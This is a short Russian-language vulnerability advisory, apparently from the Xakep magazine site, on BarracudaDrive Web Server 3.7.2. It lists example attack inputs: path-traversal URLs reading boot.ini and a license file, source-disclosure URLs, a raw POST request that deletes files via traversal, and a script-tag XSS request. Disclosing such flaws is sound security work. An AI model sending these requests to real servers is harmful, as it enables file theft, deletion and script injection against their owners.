Множественные уязвимости в BarracudaDrive Web Server

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: BarracudaDrive Web Server 3.7.2

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему, удалить, получить или просмотреть произвольные файлы, выполнить
произвольный HTML или script код. Уязвимость существует из-за ошибки в проверке
входных данных.

Пример:

http://www.example.com/\..\..\..\boot.ini
http://www.example.com/%80..\..\..\boot.ini
http://www.example.com/%ff..\bdlicense.dat

http://www.example.com/lua.lsp+
http://www.example.com/lua.lsp.
http://www.example.com/lua.lsp%80

POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
Host: www.example.com
Cookie: "use the real user's cookie!"
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

dir=..\..\..\file.txt

POST /eh/chat.ehintf/C. HTTP/1.1
Host: www.example.com
Content-Type: text/plain
Content-Length: 0
Cookie: "use the real user's cookie!"

GET <script>alert('hello');</script> HTTP/1.0